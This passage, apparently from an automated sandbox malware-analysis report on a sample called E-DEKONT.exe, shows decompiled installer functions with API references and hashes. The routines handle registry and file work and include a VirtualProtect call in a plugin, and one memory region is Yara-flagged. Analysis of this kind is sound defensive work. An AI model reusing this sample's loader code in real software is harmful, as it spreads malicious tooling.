                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3356406503-0
                                                                            • Opcode ID: 0938e9b4f9308f6345532a113f67175e1bd9ec8ec38cc62e7fbccb862b86bbb8
                                                                            • Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
                                                                            • Opcode Fuzzy Hash: 0938e9b4f9308f6345532a113f67175e1bd9ec8ec38cc62e7fbccb862b86bbb8
                                                                            • Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 69%
                                                                            			E00401389(signed int _a4) {
                                                                            				intOrPtr* _t6;
                                                                            				void* _t8;
                                                                            				void* _t10;
                                                                            				signed int _t11;
                                                                            				void* _t12;
                                                                            				signed int _t16;
                                                                            				signed int _t17;
                                                                            				void* _t18;
                                                                            
                                                                            				_t17 = _a4;
                                                                            				while(_t17 >= 0) {
                                                                            					_t6 = _t17 * 0x1c +  *0x434f30;
                                                                            					if( *_t6 == 1) {
                                                                            						break;
                                                                            					}
                                                                            					_push(_t6); // executed
                                                                            					_t8 = E00401434(); // executed
                                                                            					if(_t8 == 0x7fffffff) {
                                                                            						return 0x7fffffff;
                                                                            					}
                                                                            					_t10 = E0040136D(_t8);
                                                                            					if(_t10 != 0) {
                                                                            						_t11 = _t10 - 1;
                                                                            						_t16 = _t17;
                                                                            						_t17 = _t11;
                                                                            						_t12 = _t11 - _t16;
                                                                            					} else {
                                                                            						_t12 = _t10 + 1;
                                                                            						_t17 = _t17 + 1;
                                                                            					}
                                                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                            						 *0x433ecc =  *0x433ecc + _t12;
                                                                            						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433ecc, 0x7530,  *0x433eb4), 0);
                                                                            					}
                                                                            				}
                                                                            				return 0;
                                                                            			}












                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                            • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                            • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                            • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00402388(void* __ebx) {
                                                                            				long _t7;
                                                                            				void* _t10;
                                                                            				void* _t14;
                                                                            				long _t18;
                                                                            				intOrPtr _t20;
                                                                            				void* _t22;
                                                                            				void* _t23;
                                                                            
                                                                            				_t14 = __ebx;
                                                                            				_t26 =  *(_t23 - 0x18) - __ebx;
                                                                            				_t20 =  *((intOrPtr*)(_t23 - 0x24));
                                                                            				if( *(_t23 - 0x18) != __ebx) {
                                                                            					_t7 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1); // executed
                                                                            					_t18 = _t7;
                                                                            					goto L4;
                                                                            				} else {
                                                                            					_t10 = E00402C77(_t26, 2); // executed
                                                                            					_t22 = _t10;
                                                                            					if(_t22 == __ebx) {
                                                                            						L6:
                                                                            						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                            					} else {
                                                                            						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
                                                                            						RegCloseKey(_t22);
                                                                            						L4:
                                                                            						if(_t18 != _t14) {
                                                                            							goto L6;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
                                                                            				return 0;
                                                                            			}











                                                                            APIs
                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteValue
                                                                            • String ID:
                                                                            • API String ID: 2831762973-0
                                                                            • Opcode ID: fccc67dc7d506ba8a36f8f9ce9b9504af6e86eb791f9cdf3a62a8028c2eeb98f
                                                                            • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                                            • Opcode Fuzzy Hash: fccc67dc7d506ba8a36f8f9ce9b9504af6e86eb791f9cdf3a62a8028c2eeb98f
                                                                            • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableShow
                                                                            • String ID:
                                                                            • API String ID: 1136574915-0
                                                                            • Opcode ID: ab0b3ff11964813a20d8fadc6ef3132646fc38e43e955189219e3d879e680ae5
                                                                            • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                                            • Opcode Fuzzy Hash: ab0b3ff11964813a20d8fadc6ef3132646fc38e43e955189219e3d879e680ae5
                                                                            • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040665C(signed int _a4) {
                                                                            				struct HINSTANCE__* _t5;
                                                                            				signed int _t10;
                                                                            
                                                                            				_t10 = _a4 << 3;
                                                                            				_t8 =  *(_t10 + 0x40a3e0);
                                                                            				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                                            				if(_t5 != 0) {
                                                                            					L2:
                                                                            					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                                            				}
                                                                            				_t5 = E004065EC(_t8); // executed
                                                                            				if(_t5 == 0) {
                                                                            					return 0;
                                                                            				}
                                                                            				goto L2;
                                                                            			}






                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                              • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                              • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                                              • Part of subcall function 004065EC: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                            • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                                            • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                            • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 68%
                                                                            			E00405D74(WCHAR* _a4, long _a8, long _a12) {
                                                                            				signed int _t5;
                                                                            				void* _t6;
                                                                            
                                                                            				_t5 = GetFileAttributesW(_a4); // executed
                                                                            				asm("sbb ecx, ecx");
                                                                            				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                            				return _t6;
                                                                            			}






                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\E-DEKONT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                            • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                            • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                            • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405D4F(WCHAR* _a4) {
                                                                            				signed char _t3;
                                                                            				signed char _t7;
                                                                            
                                                                            				_t3 = GetFileAttributesW(_a4); // executed
                                                                            				_t7 = _t3;
                                                                            				if(_t7 != 0xffffffff) {
                                                                            					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                            				}
                                                                            				return _t7;
                                                                            			}






                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405954,?,?,00000000,00405B2A,?,?,?,?), ref: 00405D54
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D68
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                            • Instruction ID: 17c45ac7ebe851d6f29742f799baae9df596671d30cdc88244d2177400b79203
                                                                            • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                            • Instruction Fuzzy Hash: C6D01276505420AFC2512738EF0C89FBF95DB54371B068B35FAE9A22F0CB304C578A98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405832(WCHAR* _a4) {
                                                                            				int _t2;
                                                                            
                                                                            				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                            				if(_t2 == 0) {
                                                                            					return GetLastError();
                                                                            				}
                                                                            				return 0;
                                                                            			}





                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnumWindows
                                                                            • String ID:
                                                                            • API String ID: 1129996299-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 33%
                                                                            			E004027E9(intOrPtr __edx, void* __eflags) {
                                                                            				long _t8;
                                                                            				long _t10;
                                                                            				LONG* _t12;
                                                                            				void* _t14;
                                                                            				intOrPtr _t15;
                                                                            				void* _t17;
                                                                            				void* _t19;
                                                                            
                                                                            				_t15 = __edx;
                                                                            				_push(ds);
                                                                            				if(__eflags != 0) {
                                                                            					_t8 = E00402C15(2);
                                                                            					_pop(_t14);
                                                                            					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
                                                                            					_t10 = SetFilePointer(E004061E2(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
                                                                            					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
                                                                            						_push(_t10);
                                                                            						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                                            						E004061C9();
                                                                            					}
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
                                                                            				return 0;
                                                                            			}











                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                                              • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointerwsprintf
                                                                            • String ID:
                                                                            • API String ID: 327478801-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00402306(int __eax, WCHAR* __ebx) {
                                                                            				WCHAR* _t11;
                                                                            				WCHAR* _t13;
                                                                            				void* _t17;
                                                                            				int _t21;
                                                                            
                                                                            				_t11 = __ebx;
                                                                            				_t5 = __eax;
                                                                            				_t13 = 0;
                                                                            				if(__eax != __ebx) {
                                                                            					__eax = E00402C37(__ebx);
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
                                                                            					_t13 = E00402C37(0x11);
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
                                                                            					_t11 = E00402C37(0x22);
                                                                            				}
                                                                            				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C37(0xffffffcd)); // executed
                                                                            				_t21 = _t5;
                                                                            				if(_t21 == 0) {
                                                                            					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
                                                                            				return 0;
                                                                            			}








                                                                            APIs
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID:
                                                                            • API String ID: 390214022-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040611D(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                            				void* _t7;
                                                                            				long _t8;
                                                                            				void* _t9;
                                                                            
                                                                            				_t7 = E00406074(_a4,  &_a12);
                                                                            				if(_t7 != 0) {
                                                                            					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                            					return _t8;
                                                                            				}
                                                                            				_t9 = 6;
                                                                            				return _t9;
                                                                            			}







                                                                            APIs
                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405E26(void* _a4, void* _a8, long _a12) {
                                                                            				int _t7;
                                                                            				long _t11;
                                                                            
                                                                            				_t11 = _a12;
                                                                            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                            					return 0;
                                                                            				} else {
                                                                            					return 1;
                                                                            				}
                                                                            			}






                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405DF7(void* _a4, void* _a8, long _a12) {
                                                                            				int _t7;
                                                                            				long _t11;
                                                                            
                                                                            				_t11 = _a12;
                                                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                            					return 0;
                                                                            				} else {
                                                                            					return 1;
                                                                            				}
                                                                            			}






                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                            
                                                                            				 *0x10004048 = _a4;
                                                                            				if(_a8 == 1) {
                                                                            					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
                                                                            					 *0x1000405c = 0xc2;
                                                                            					 *0x1000404c = 0;
                                                                            					 *0x10004054 = 0;
                                                                            					 *0x10004068 = 0;
                                                                            					 *0x10004058 = 0;
                                                                            					 *0x10004050 = 0;
                                                                            					 *0x10004060 = 0;
                                                                            					 *0x1000405e = 0;
                                                                            				}
                                                                            				return 1;
                                                                            			}




                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004060EF(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                            				void* _t7;
                                                                            				long _t8;
                                                                            				void* _t9;
                                                                            
                                                                            				_t7 = E00406074(_a4,  &_a12);
                                                                            				if(_t7 != 0) {
                                                                            					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                            					return _t8;
                                                                            				}
                                                                            				_t9 = 6;
                                                                            				return _t9;
                                                                            			}







                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,0040617D,0042C228,00000000,?,?,Call,?), ref: 00406113
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004015A3() {
                                                                            				int _t5;
                                                                            				void* _t11;
